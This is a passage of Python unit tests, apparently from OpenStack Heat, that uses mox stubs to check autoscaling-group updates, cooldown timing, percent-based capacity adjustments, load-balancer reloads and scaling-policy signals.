self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Increase min size to 2 via DesiredCapacity, should adjust
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(1)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
props['DesiredCapacity'] = '2'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(2, len(rsrc.get_instance_names()))
self.assertEqual(2, rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired_zero(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Increase min size to 2 via DesiredCapacity, should adjust
self._stub_lb_reload(0)
self._stub_meta_expected(now, 'ExactCapacity : 0')
self._stub_delete(1)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
props['MinSize'] = '0'
props['DesiredCapacity'] = '0'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(0, len(rsrc.get_instance_names()))
self.assertEqual(0, rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_desired_remove(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(2, len(rsrc.get_instance_names()))
instance_names = rsrc.get_instance_names()
self.m.VerifyAll()
self.m.UnsetStubs()
# Remove DesiredCapacity from the updated template, which should
# have no effect, it's an optional parameter
self._stub_meta_expected(now)
self.m.ReplayAll()
props = copy.copy(rsrc.properties.data)
del props['DesiredCapacity']
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(instance_names, rsrc.get_instance_names())
self.assertIsNone(rsrc.properties['DesiredCapacity'])
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_ok_cooldown(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['Cooldown'] = '60'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
props = copy.copy(rsrc.properties.data)
props['Cooldown'] = '61'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(61, rsrc.properties['Cooldown'])
rsrc.delete()
self.m.VerifyAll()
def test_lb_reload_static_resolve(self):
t = template_format.parse(as_template)
properties = t['Resources']['ElasticLoadBalancer']['Properties']
properties['AvailabilityZones'] = {'Fn::GetAZs': ''}
self.m.StubOutWithMock(parser.Stack, 'get_availability_zones')
parser.Stack.get_availability_zones().MultipleTimes().AndReturn(
['abc', 'xyz'])
# Check that the Fn::GetAZs is correctly resolved
expected = {u'Type': u'AWS::ElasticLoadBalancing::LoadBalancer',
u'Properties': {'Instances': ['aaaabbbbcccc'],
u'Listeners': [{u'InstancePort': u'80',
u'LoadBalancerPort': u'80',
u'Protocol': u'HTTP'}],
u'AvailabilityZones': ['abc', 'xyz']}}
self.m.StubOutWithMock(short_id, 'generate_id')
short_id.generate_id().AndReturn('aaaabbbbcccc')
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
lb = stack['ElasticLoadBalancer']
self.m.StubOutWithMock(lb, 'handle_update')
lb.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(1, len(rsrc.get_instance_names()))
props = copy.copy(rsrc.properties.data)
props['Cooldown'] = '61'
update_snippet = rsrc_defn.ResourceDefinition(rsrc.name,
rsrc.type(),
props)
scheduler.TaskRunner(rsrc.update, update_snippet)()
rsrc.delete()
self.m.VerifyAll()
def test_lb_reload_members(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123'
}
}
expected = {
'Type': 'OS::Neutron::LoadBalancer',
'Properties': {
'protocol_port': 8080,
'pool_id': 'pool123',
'members': [u'aaaabbbbcccc']}
}
self.m.StubOutWithMock(short_id, 'generate_id')
short_id.generate_id().AndReturn('aaaabbbbcccc')
self.m.StubOutWithMock(neutron_lb.LoadBalancer, 'handle_update')
neutron_lb.LoadBalancer.handle_update(expected,
mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(None)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
self.create_scaling_group(t, stack, 'WebServerGroup')
self.m.VerifyAll()
def test_lb_reload_invalid_resource(self):
t = template_format.parse(as_template)
t['Resources']['ElasticLoadBalancer'] = {
'Type': 'AWS::EC2::Volume',
'Properties': {
'AvailabilityZone': 'nova'
}
}
self._stub_create(1)
self.m.ReplayAll()
stack = utils.parse_stack(t, params=self.params)
error = self.assertRaises(
exception.ResourceFailure,
self.create_scaling_group, t, stack, 'WebServerGroup')
self.assertEqual(
"Error: Unsupported resource 'ElasticLoadBalancer' in "
"LoadBalancerNames",
six.text_type(error))
self.m.VerifyAll()
def test_scaling_group_adjust(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# start with 3
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '3'
self._stub_lb_reload(3)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 3', 0)
self._stub_create(3)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(3, len(rsrc.get_instance_names()))
# reduce to 1
self._stub_lb_reload(1)
self._stub_delete(2)
self.stub_ImageConstraint_validate(num=1)
self._stub_meta_expected(now, 'ChangeInCapacity : -2')
self._stub_scale_notification(adjust=-2, groupname=rsrc.FnGetRefId(),
start_capacity=3, end_capacity=1)
self.m.ReplayAll()
rsrc.adjust(-2)
self.assertEqual(1, len(rsrc.get_instance_names()))
# raise to 3
self._stub_lb_reload(3)
self._stub_meta_expected(now, 'ChangeInCapacity : 2')
self._stub_create(2)
self._stub_scale_notification(adjust=2, groupname=rsrc.FnGetRefId(),
start_capacity=1, end_capacity=3)
self.m.ReplayAll()
rsrc.adjust(2)
self.assertEqual(3, len(rsrc.get_instance_names()))
# set to 2
self._stub_lb_reload(2)
self._stub_delete(1)
self.stub_ImageConstraint_validate(num=2)
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_scale_notification(adjust=2, groupname=rsrc.FnGetRefId(),
adjust_type='ExactCapacity',
start_capacity=3, end_capacity=2)
self.m.ReplayAll()
rsrc.adjust(2, 'ExactCapacity')
self.assertEqual(2, len(rsrc.get_instance_names()))
self.m.VerifyAll()
def test_scaling_group_scale_up_failure(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(1, len(rsrc.get_instance_names()))
self.m.VerifyAll()
self.m.UnsetStubs()
# Scale up one 1 instance with resource failure
self._stub_create(1, with_error='Bang')
self._stub_lb_reload(1, unset=False, nochange=True)
self._stub_scale_notification(adjust=1,
groupname=rsrc.FnGetRefId(),
start_capacity=1,
with_error='Bang')
self.m.ReplayAll()
self.assertRaises(exception.Error, rsrc.adjust, 1)
self.assertEqual(1, len(rsrc.get_instance_names()))
self.m.VerifyAll()
def test_scaling_group_truncate_adjustment(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# raise above the max
self._stub_lb_reload(5)
self._stub_meta_expected(now, 'ChangeInCapacity : 4')
self._stub_create(3)
self.m.ReplayAll()
rsrc.adjust(4)
self.assertEqual(5, len(rsrc.get_instance_names()))
# lower below the min
self._stub_lb_reload(1)
self._stub_delete(4)
self.stub_ImageConstraint_validate(num=1)
self._stub_meta_expected(now, 'ChangeInCapacity : -5')
self.m.ReplayAll()
rsrc.adjust(-5)
self.assertEqual(1, len(rsrc.get_instance_names()))
# no change
self.m.VerifyAll()
self.m.UnsetStubs()
self._stub_meta_expected(now)
self.m.ReplayAll()
rsrc.adjust(0)
self.assertEqual(1, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def _do_test_scaling_group_percent(self, decrease, lowest,
increase, create, highest):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# reduce by decrease %
self._stub_lb_reload(lowest)
adjust = 'PercentChangeInCapacity : %d' % decrease
self._stub_meta_expected(now, adjust)
self._stub_delete(2 - lowest)
self.stub_ImageConstraint_validate(num=1)
self.m.ReplayAll()
rsrc.adjust(decrease, 'PercentChangeInCapacity')
self.assertEqual(lowest, len(rsrc.get_instance_names()))
# raise by increase %
self._stub_lb_reload(highest)
adjust = 'PercentChangeInCapacity : %d' % increase
self._stub_meta_expected(now, adjust)
self._stub_create(create)
self.m.ReplayAll()
rsrc.adjust(increase, 'PercentChangeInCapacity')
self.assertEqual(highest, len(rsrc.get_instance_names()))
rsrc.delete()
def test_scaling_group_percent(self):
self._do_test_scaling_group_percent(-50, 1, 200, 2, 3)
def test_scaling_group_percent_round_up(self):
self._do_test_scaling_group_percent(-33, 1, 33, 1, 2)
def test_scaling_group_percent_round_down(self):
self._do_test_scaling_group_percent(-66, 1, 225, 2, 3)
def test_scaling_group_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# reduce by 50%
self._stub_lb_reload(1)
self._stub_delete(1)
self.stub_ImageConstraint_validate(num=1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
# Note: in reality the group create is counted as a cooldown event, so
# there would actually be metadata here and the scale up would not
# happen
resource.Resource.metadata_get().MultipleTimes().AndReturn({})
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Resource.metadata_get since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
previous_meta = {'cooldown': {now.isoformat():
'PercentChangeInCapacity : -50'}}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
timeutils.set_time_override(now)
self.addCleanup(timeutils.clear_time_override)
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
self.m.ReplayAll()
# raise by 200%, too soon for Cooldown so there should be no change
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(1, len(rsrc.get_instance_names()))
rsrc.delete()
def test_scaling_group_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 60s
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '60'
self._stub_lb_reload(2)
self._stub_create(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# reduce by 50%
self._stub_lb_reload(1)
self._stub_delete(1)
self.stub_ImageConstraint_validate(num=1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
# Note: in reality the group create is counted as a cooldown event, so
# there would actually be metadata here and the scale up would not
# happen
resource.Resource.metadata_get().MultipleTimes().AndReturn({})
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Now move time on 61 seconds - Cooldown in template is 60
# so this should update the policy metadata, and the
# scaling group instances updated
previous_meta = {'cooldown': {now.isoformat():
'PercentChangeInCapacity : -50'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=61)
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
#stub for the metadata accesses while creating the two instances
resource.Resource.metadata_get()
resource.Resource.metadata_get()
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_create(2)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(3, len(rsrc.get_instance_names()))
rsrc.delete()
def test_scaling_group_cooldown_zero(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances, Cooldown 0
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
properties['Cooldown'] = '0'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# reduce by 50%
self._stub_lb_reload(1)
self._stub_meta_expected(now, 'PercentChangeInCapacity : -50')
self._stub_delete(1)
self.stub_ImageConstraint_validate(num=1)
init_meta = {'cooldown': {now.isoformat(): 'ExactCapacity : -50'},
'scaling_in_progress': False}
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
resource.Resource.metadata_get().MultipleTimes().AndReturn(init_meta)
self.m.ReplayAll()
rsrc.adjust(-50, 'PercentChangeInCapacity')
self.assertEqual(1, len(rsrc.get_instance_names()))
# Don't move time, since cooldown is zero, it should work
previous_meta = {'cooldown': {now.isoformat():
'PercentChangeInCapacity : -50'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(resource.Resource, 'metadata_get')
rsrc.metadata_get().MultipleTimes().AndReturn(previous_meta)
# raise by 200%, should work
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'PercentChangeInCapacity : 200')
self._stub_create(2)
self.m.ReplayAll()
rsrc.adjust(200, 'PercentChangeInCapacity')
self.assertEqual(3, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_bad_group(self):
t = template_format.parse(as_template_bad_group)
stack = utils.parse_stack(t, params=self.params)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
alarm_url = up_policy.FnGetAtt('AlarmUrl')
self.assertIsNotNone(alarm_url)
ex = self.assertRaises(exception.ResourceFailure, up_policy.signal)
self.assertIn('Alarm WebServerScaleUpPolicy could '
'not find scaling group', six.text_type(ex))
self.m.VerifyAll()
def test_scaling_policy_up(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
alarm_url = up_policy.FnGetAtt('AlarmUrl')
self.assertIsNotNone(alarm_url)
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_up_meta_update(self):
t = template_format.parse(as_template)
# Add CustomLB (just AWS::EC2::Instance) to template
t['Resources']['MyCustomLB'] = {
'Type': 'AWS::EC2::Instance',
'ImageId': {'Ref': 'ImageId'},
'InstanceType': 'bar',
'Metadata': {
'IPs': {'Fn::GetAtt': ['WebServerGroup', 'InstanceList']}
}
}
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
alarm_url = up_policy.FnGetAtt('AlarmUrl')
self.assertIsNotNone(alarm_url)
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
# Check CustomLB metadata was updated
self.m.StubOutWithMock(instance.Instance, '_ipaddress')
instance.Instance._ipaddress().MultipleTimes().AndReturn(
'127.0.0.1')
self.m.ReplayAll()
expected_meta = {'IPs': u'127.0.0.1,127.0.0.1'}
self.assertEqual(expected_meta, stack['MyCustomLB'].metadata_get())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_down(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group, 2 instances
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2', 0)
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(2, len(rsrc.get_instance_names()))
# Scale down one
self._stub_lb_reload(1)
self._stub_delete(1)
self.stub_ImageConstraint_validate(num=1)
self._stub_meta_expected(now, 'ChangeInCapacity : -1', 2)
self.m.ReplayAll()
down_policy = self.create_scaling_policy(t, stack,
'WebServerScaleDownPolicy')
down_policy.signal()
self.assertEqual(1, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_toosoon(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
up_policy = stack['WebServerScaleUpPolicy']
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn({})
# Note: in reality the group create is counted as a cooldown event, so
# there would actually be metadata here and the scale up would not
# happen
rsrc.metadata_get().MultipleTimes().AndReturn({})
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
# Now move time on 10 seconds - Cooldown in template is 60
# so this should not update the policy metadata, and the
# scaling group instances should be unchanged
# Note we have to stub Resource.metadata_get since up_policy isn't
# stored in the DB (because the stack hasn't really been created)
prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
now = now + datetime.timedelta(seconds=10)
timeutils.set_time_override(now)
self.addCleanup(timeutils.clear_time_override)
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().AndReturn(prev_meta.copy())
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_ok(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
up_policy = stack['WebServerScaleUpPolicy']
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn({})
# Note: in reality the group create is counted as a cooldown event, so
# there would actually be metadata here and the scale up would not
# happen
rsrc.metadata_get().MultipleTimes().AndReturn({})
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
self.m.VerifyAll()
self.m.UnsetStubs()
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
'scaling_in_progress': False}
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(3, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_zero(self):
t = template_format.parse(as_template)
# Create the scaling policy (with Cooldown=0) and scale up one
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
properties['Cooldown'] = '0'
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
# Now trigger another scale-up without changing time, should work
prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(3, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_cooldown_none(self):
t = template_format.parse(as_template)
# Create the scaling policy no Cooldown property, should behave the
# same as when Cooldown==0
properties = t['Resources']['WebServerScaleUpPolicy']['Properties']
del properties['Cooldown']
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
init_meta = {'cooldown': {now.isoformat(): 'ExactCapacity : 1'},
'scaling_in_progress': False}
up_policy = stack['WebServerScaleUpPolicy']
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn(init_meta.copy())
rsrc.metadata_get().MultipleTimes().AndReturn(init_meta.copy())
self.m.ReplayAll()
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
# Now trigger another scale-up without changing time, should work
prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
self._stub_lb_reload(3, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.ReplayAll()
up_policy.signal()
self.assertEqual(3, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_policy_update(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
# Create initial group
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
stack.resources['WebServerGroup'] = rsrc
self.assertEqual(1, len(rsrc.get_instance_names()))
# Create initial scaling policy
up_policy = self.create_scaling_policy(t, stack,
'WebServerScaleUpPolicy')
# Scale up one
self._stub_lb_reload(2)
self._stub_meta_expected(now, 'ChangeInCapacity : 1', 2)
self._stub_create(1)
self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn({})
# Note: in reality the group create is counted as a cooldown event, so
# there would actually be metadata here and the scale up would not
# happen
rsrc.metadata_get().MultipleTimes().AndReturn({})
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(2, len(rsrc.get_instance_names()))
# Update scaling policy
props = copy.copy(up_policy.properties.data)
props['ScalingAdjustment'] = '2'
update_snippet = rsrc_defn.ResourceDefinition(up_policy.name,
up_policy.type(),
props)
scheduler.TaskRunner(up_policy.update, update_snippet)()
self.assertEqual(2, up_policy.properties['ScalingAdjustment'])
# Now move time on 61 seconds - Cooldown in template is 60
# so this should trigger a scale-up
prev_meta = {'cooldown': {now.isoformat(): 'ChangeInCapacity : 1'},
'scaling_in_progress': False}
self.m.VerifyAll()
self.m.UnsetStubs()
